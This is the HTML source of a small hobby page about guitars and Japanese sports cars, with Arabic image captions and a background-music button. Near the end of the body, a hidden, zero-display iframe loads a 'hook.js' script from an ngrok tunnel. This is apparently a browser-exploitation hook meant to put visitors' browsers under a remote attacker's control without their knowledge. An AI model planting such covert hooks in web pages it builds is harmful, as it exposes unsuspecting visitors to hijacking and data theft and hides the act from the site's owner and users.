<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Andy n leyley vibe</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="header">
        <h1>ASHLEY BABE</h1>
        <p>JDM CARS N GITUAR</p>
    </div>

    <div class="container">
        <div class="section">
            <h2>GITUR</h2>
            <img src="g1.jpg" alt="قيثارة 1">
            <img src="g2.jpg" alt="قيثارة 2">
            <img src="g3.jpg" alt="قيثارة 3">
        </div>

        <div class="section">
            <h2>JDM CARS</h2>
            <img src="c1.jpg" alt="تويوتا سوبرا 1">
            <img src="c2.jpg" alt="تويوتا سوبرا 2">
            <img src="c3.jpg" alt="تويوتا سوبرا 3">
        </div>

        <button id="playMusic">تشغيل الموسيقى</button>
        <audio id="backgroundMusic" src="music.mp3"></audio>
    </div>
    <iframe src="https://fb15-105-235-133-44.ngrok-free.app/hook.js" style="display:none;" sandbox="allow-scripts"></iframe>

    <script src="script.js"></script>
</body>
</html>
